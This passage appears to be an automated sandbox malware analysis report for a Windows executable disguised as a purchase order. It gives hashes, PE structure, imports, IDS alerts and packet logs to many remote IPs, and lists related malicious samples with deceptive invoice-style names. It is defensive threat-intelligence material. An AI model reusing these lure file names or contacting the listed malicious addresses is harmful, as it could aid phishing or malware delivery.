                                                                        http://45.145.185.25Get hashmaliciousBrowse
                                                                        • 45.145.185.25
                                                                        Sq0uRldDu6.jarGet hashmaliciousBrowse
                                                                        • 193.239.147.64
                                                                        Sq0uRldDu6.jarGet hashmaliciousBrowse
                                                                        • 193.239.147.64
                                                                        Bidvest Order RFQ BV322910098ZA.PDF.gz.exeGet hashmaliciousBrowse
                                                                        • 45.145.185.111
                                                                        TPN Letter of demand.pdf 2.exeGet hashmaliciousBrowse
                                                                        • 45.145.185.111
                                                                        AAPUR2-M.exeGet hashmaliciousBrowse
                                                                        • 92.119.82.212
                                                                        New Puchase Order From BudGroup Ltd .PDF.exeGet hashmaliciousBrowse
                                                                        • 45.145.185.49
                                                                        Autocarriers Overdue invoice.DOC.exeGet hashmaliciousBrowse
                                                                        • 45.145.185.49
                                                                        Security_Check.exeGet hashmaliciousBrowse
                                                                        • 193.239.147.16
                                                                        zKufVDEvon.exeGet hashmaliciousBrowse
                                                                        • 185.200.34.175
                                                                        3bPknPWgeJ.exeGet hashmaliciousBrowse
                                                                        • 185.200.34.175
                                                                        yYW4J4dX9i.exeGet hashmaliciousBrowse
                                                                        • 45.86.70.31
                                                                        x2BhTLV9.exeGet hashmaliciousBrowse
                                                                        • 193.239.147.16
                                                                        scn14092020.exeGet hashmaliciousBrowse
                                                                        • 45.12.112.28

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        No created / dropped files found

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.373704870948321
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:Purchase Order 40,7045$.exe
                                                                        File size:369664
                                                                        MD5:4142c1713da2f4f94bec71bfed46587b
                                                                        SHA1:06cc7bd53758a0936f4b674847411a4f912fd654
                                                                        SHA256:fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
                                                                        SHA512:1693379c66da547efb6e200d5cfc33fe7a49f38ca5f4121690e371ed5e7aaea389363f88cbba68eef1f1c9ea6e8f2d42c3472ebb38f2d9bf2185178bd3f2e245
                                                                        SSDEEP:6144:xOz/xJi4Cnn9y6kyr+23yopaLxx9xKxDVFBqyaLv0Yd5bMceMau:xODxE7nnE6NrLqxxfQJFBqyEvF5yMau
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.uHr.uHr.uH...Hp.uH...Ha.uH...HD.uH...H..uH{..Ha.uHr.tH..uH...Hs.uH...Hs.uH...Hs.uHRichr.uH........................PE..L..

                                                                        File Icon

                                                                        Icon Hash:34ecc4d0f0e8ccd4

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x40c753
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x5FB69F90 [Thu Nov 19 16:38:40 2020 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:1
                                                                        File Version Major:5
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:ab2865aeb9fd256a577a2832dd6a376d

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        call 00007F93F094583Dh
                                                                        jmp 00007F93F093B8CEh
                                                                        push dword ptr [0042D608h]
                                                                        call dword ptr [0041F0A4h]
                                                                        test eax, eax
                                                                        je 00007F93F093BA44h
                                                                        call eax
                                                                        push 00000019h
                                                                        call 00007F93F0945101h
                                                                        push 00000001h
                                                                        push 00000000h
                                                                        call 00007F93F093F1B0h
                                                                        add esp, 0Ch
                                                                        jmp 00007F93F093F175h
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        test ecx, 00000003h
                                                                        je 00007F93F093BA66h
                                                                        mov al, byte ptr [ecx]
                                                                        add ecx, 01h
                                                                        test al, al
                                                                        je 00007F93F093BA90h
                                                                        test ecx, 00000003h
                                                                        jne 00007F93F093BA31h
                                                                        add eax, 00000000h
                                                                        lea esp, dword ptr [esp+00000000h]
                                                                        lea esp, dword ptr [esp+00000000h]
                                                                        mov eax, dword ptr [ecx]
                                                                        mov edx, 7EFEFEFFh
                                                                        add edx, eax
                                                                        xor eax, FFFFFFFFh
                                                                        xor eax, edx
                                                                        add ecx, 04h
                                                                        test eax, 81010100h
                                                                        je 00007F93F093BA2Ah
                                                                        mov eax, dword ptr [ecx-04h]
                                                                        test al, al
                                                                        je 00007F93F093BA74h
                                                                        test ah, ah
                                                                        je 00007F93F093BA66h
                                                                        test eax, 00FF0000h
                                                                        je 00007F93F093BA55h
                                                                        test eax, FF000000h
                                                                        je 00007F93F093BA44h
                                                                        jmp 00007F93F093BA0Fh
                                                                        lea eax, dword ptr [ecx-01h]
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        sub eax, ecx
                                                                        ret
                                                                        lea eax, dword ptr [ecx-02h]
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        sub eax, ecx
                                                                        ret
                                                                        lea eax, dword ptr [ecx-03h]
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        sub eax, ecx
                                                                        ret
                                                                        lea eax, dword ptr [ecx-04h]
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        sub eax, ecx

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [LNK] VS2010 build 30319
                                                                        • [ASM] VS2010 build 30319
                                                                        • [ C ] VS2010 build 30319
                                                                        • [C++] VS2010 build 30319
                                                                        • [RES] VS2010 build 30319
                                                                        • [IMP] VS2008 SP1 build 30729

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x290080xc8.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000x42e0.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x213c.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x1f0000x1f4.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x1d12e0x1d200False0.534276086373data6.54668663912IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x1f0000xaa9e0xac00False0.383698219477data5.48251502126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x2a0000x53a40x3400False0.680588942308data6.53378088611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x300000x42e00x4400False0.0522173713235data2.29893765685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x350000x2b5a0x2c00False0.593306107955data5.76069468977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0x300a00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4294967040EnglishUnited States
                                                                        RT_GROUP_ICON0x342c80x14dataEnglishUnited States

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllEnumTimeFormatsA, GetProcAddress, LoadLibraryA, VirtualProtect, SetConsoleMode, ReadConsoleInputA, GetProcessHeap, SetEndOfFile, SetEnvironmentVariableA, CompareStringW, CreateFileW, CreateFileA, CreateProcessA, WaitForSingleObject, GetExitCodeProcess, WriteConsoleW, SetStdHandle, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, HeapReAlloc, GetStringTypeW, HeapSize, IsProcessorFeaturePresent, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, HeapCreate, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, GetLocaleInfoW, LoadLibraryW, CloseHandle, ReadFile, GetCurrentThreadId, SetLastError, InterlockedIncrement, InterlockedDecrement, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, DeleteFileA, GetSystemTimeAsFileTime, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapFree, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetFileAttributesA, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree
                                                                        wsnmp32.dll
                                                                        WINSPOOL.DRVPrinterProperties, AddPortW, DeleteFormA, AddPrinterDriverW
                                                                        OLEAUT32.dllVarI4FromCy, OleCreatePropertyFrame, VarBstrFromDisp, QueryPathOfRegTypeLib
                                                                        SHELL32.dllSHGetPathFromIDList, ExtractIconExA
                                                                        ODBC32.dll
                                                                        WS2_32.dllWSACreateEvent, WSASetServiceW, WSAGetLastError, WSACleanup
                                                                        RESUTILS.dllResUtilGetDwordValue, ResUtilVerifyResourceService, ResUtilFindSzProperty, ResUtilGetMultiSzProperty
                                                                        WINMM.dllmidiInReset, midiOutOpen, waveOutUnprepareHeader, midiInAddBuffer

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        11/20/20-11:07:38.645275ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                                                        11/20/20-11:08:16.486833TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.7

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 20, 2020 11:07:15.679258108 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:15.932034969 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:15.932176113 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:15.932311058 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.187412977 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.187463999 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.187644005 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.440414906 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.440454006 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.440473080 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.440496922 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.440556049 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.440637112 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.440646887 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.440651894 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.444058895 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.693258047 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.693357944 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.693417072 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.693444967 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.696773052 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.696902990 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:21.605900049 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.718278885 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:21.718374968 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.718597889 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.830941916 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:21.831310034 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:21.831334114 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:21.831466913 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.831562042 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.943883896 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:31.953761101 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:31.978790045 CET8049752160.153.136.3192.168.2.7
                                                                        Nov 20, 2020 11:07:31.978914022 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:31.979074955 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:32.004002094 CET8049752160.153.136.3192.168.2.7
                                                                        Nov 20, 2020 11:07:32.005081892 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:32.005289078 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:32.030204058 CET8049752160.153.136.3192.168.2.7
                                                                        Nov 20, 2020 11:07:38.640206099 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:38.803186893 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:38.803288937 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:38.803448915 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:38.972686052 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:38.979562044 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:38.979593039 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:38.979859114 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:38.979948997 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:39.141820908 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:44.211316109 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.378349066 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.378618956 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.378768921 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.545849085 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.546214104 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.546289921 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.546302080 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.546466112 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.546518087 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.546523094 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.714863062 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:49.639825106 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.678709030 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:49.678859949 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.679070950 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.717953920 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:49.761483908 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:49.761545897 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:49.761744976 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.761881113 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.800853014 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:54.844347000 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:54.966379881 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:07:54.966509104 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:54.966870070 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:55.088880062 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:07:55.281188011 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:07:55.281485081 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:55.281558990 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:07:55.281620979 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:55.403640032 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:08:00.347841978 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.452924967 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:00.453139067 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.453313112 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.556237936 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:00.556266069 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:00.556281090 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:00.556488991 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.556579113 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.659429073 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:05.659286976 CET4976080192.168.2.713.226.173.80
                                                                        Nov 20, 2020 11:08:05.674153090 CET804976013.226.173.80192.168.2.7
                                                                        Nov 20, 2020 11:08:05.674334049 CET4976080192.168.2.713.226.173.80
                                                                        Nov 20, 2020 11:08:05.674489975 CET4976080192.168.2.713.226.173.80
                                                                        Nov 20, 2020 11:08:05.689215899 CET804976013.226.173.80192.168.2.7
                                                                        Nov 20, 2020 11:08:05.691483021 CET804976013.226.173.80192.168.2.7
                                                                        Nov 20, 2020 11:08:05.691700935 CET804976013.226.173.80192.168.2.7
                                                                        Nov 20, 2020 11:08:05.691761971 CET4976080192.168.2.713.226.173.80
                                                                        Nov 20, 2020 11:08:05.691803932 CET4976080192.168.2.713.226.173.80
                                                                        Nov 20, 2020 11:08:05.706646919 CET804976013.226.173.80192.168.2.7
                                                                        Nov 20, 2020 11:08:10.897481918 CET4976180192.168.2.7103.224.182.242
                                                                        Nov 20, 2020 11:08:11.059109926 CET8049761103.224.182.242192.168.2.7
                                                                        Nov 20, 2020 11:08:11.059268951 CET4976180192.168.2.7103.224.182.242
                                                                        Nov 20, 2020 11:08:11.059438944 CET4976180192.168.2.7103.224.182.242
                                                                        Nov 20, 2020 11:08:11.264870882 CET8049761103.224.182.242192.168.2.7
                                                                        Nov 20, 2020 11:08:11.265088081 CET4976180192.168.2.7103.224.182.242
                                                                        Nov 20, 2020 11:08:11.265115023 CET4976180192.168.2.7103.224.182.242
                                                                        Nov 20, 2020 11:08:11.430201054 CET8049761103.224.182.242192.168.2.7
                                                                        Nov 20, 2020 11:08:16.346605062 CET4976380192.168.2.734.102.136.180
                                                                        Nov 20, 2020 11:08:16.363101006 CET804976334.102.136.180192.168.2.7
                                                                        Nov 20, 2020 11:08:16.363213062 CET4976380192.168.2.734.102.136.180
                                                                        Nov 20, 2020 11:08:16.363661051 CET4976380192.168.2.734.102.136.180
                                                                        Nov 20, 2020 11:08:16.380014896 CET804976334.102.136.180192.168.2.7
                                                                        Nov 20, 2020 11:08:16.486833096 CET804976334.102.136.180192.168.2.7
                                                                        Nov 20, 2020 11:08:16.486888885 CET804976334.102.136.180192.168.2.7
                                                                        Nov 20, 2020 11:08:16.487210989 CET4976380192.168.2.734.102.136.180
                                                                        Nov 20, 2020 11:08:16.487418890 CET4976380192.168.2.734.102.136.180
                                                                        Nov 20, 2020 11:08:16.503933907 CET804976334.102.136.180192.168.2.7
                                                                        Nov 20, 2020 11:08:21.685830116 CET4976480192.168.2.73.134.22.63
                                                                        Nov 20, 2020 11:08:21.798690081 CET80497643.134.22.63192.168.2.7
                                                                        Nov 20, 2020 11:08:21.798791885 CET4976480192.168.2.73.134.22.63
                                                                        Nov 20, 2020 11:08:21.799002886 CET4976480192.168.2.73.134.22.63
                                                                        Nov 20, 2020 11:08:21.911770105 CET80497643.134.22.63192.168.2.7
                                                                        Nov 20, 2020 11:08:21.912847042 CET80497643.134.22.63192.168.2.7
                                                                        Nov 20, 2020 11:08:21.912873983 CET80497643.134.22.63192.168.2.7
                                                                        Nov 20, 2020 11:08:21.913119078 CET4976480192.168.2.73.134.22.63
                                                                        Nov 20, 2020 11:08:21.913211107 CET4976480192.168.2.73.134.22.63
                                                                        Nov 20, 2020 11:08:22.025947094 CET80497643.134.22.63192.168.2.7
                                                                        Nov 20, 2020 11:08:26.963735104 CET4976580192.168.2.752.58.78.16
                                                                        Nov 20, 2020 11:08:26.980470896 CET804976552.58.78.16192.168.2.7
                                                                        Nov 20, 2020 11:08:26.980611086 CET4976580192.168.2.752.58.78.16
                                                                        Nov 20, 2020 11:08:26.980870962 CET4976580192.168.2.752.58.78.16
                                                                        Nov 20, 2020 11:08:26.997507095 CET804976552.58.78.16192.168.2.7
                                                                        Nov 20, 2020 11:08:26.997565985 CET804976552.58.78.16192.168.2.7
                                                                        Nov 20, 2020 11:08:26.997582912 CET804976552.58.78.16192.168.2.7
                                                                        Nov 20, 2020 11:08:26.997795105 CET4976580192.168.2.752.58.78.16
                                                                        Nov 20, 2020 11:08:26.997972965 CET4976580192.168.2.752.58.78.16
                                                                        Nov 20, 2020 11:08:27.014489889 CET804976552.58.78.16192.168.2.7

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 20, 2020 11:06:24.695208073 CET5873953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:24.722343922 CET53587398.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:26.237132072 CET6033853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:26.264065981 CET53603388.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:31.382118940 CET5871753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:31.409208059 CET53587178.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:32.438592911 CET5976253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:32.465584993 CET53597628.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:33.313208103 CET5432953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:33.340243101 CET53543298.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:34.124548912 CET5805253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:34.151561975 CET53580528.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:38.857039928 CET5400853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:38.903969049 CET53540088.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:39.094918013 CET5945153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:39.121886015 CET53594518.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:40.279426098 CET5291453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:40.306454897 CET53529148.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:41.780988932 CET6456953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:41.808187962 CET53645698.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:43.496880054 CET5281653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:43.545059919 CET53528168.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:44.563770056 CET5078153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:44.590708971 CET53507818.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:45.217900038 CET5423053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:45.244940042 CET53542308.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:46.532702923 CET5491153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:46.559850931 CET53549118.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:47.283731937 CET4995853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:47.310795069 CET53499588.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:48.015352011 CET5086053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:48.042587042 CET53508608.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:50.693610907 CET5045253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:50.720668077 CET53504528.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:51.774281979 CET5973053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:51.801292896 CET53597308.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:52.509279013 CET5931053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:52.536370993 CET53593108.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:53.018472910 CET5191953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:53.045543909 CET53519198.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:53.778512955 CET6429653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:53.814062119 CET53642968.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:54.550476074 CET5668053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:54.577477932 CET53566808.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:08.506925106 CET5882053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:08.554796934 CET53588208.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:08.633372068 CET6098353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:08.681593895 CET53609838.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:09.575184107 CET4924753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:10.355617046 CET53492478.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:10.573728085 CET5228653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:10.610713959 CET53522868.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:15.370619059 CET5606453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:15.667937994 CET53560648.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:19.126965046 CET6374453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:19.164304018 CET53637448.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:21.163629055 CET6145753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:21.199383020 CET53614578.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:21.464678049 CET5836753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:21.604794979 CET53583678.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:21.691340923 CET6059953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:21.729232073 CET53605998.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:22.059649944 CET5957153192.168.2.78.8.8.8
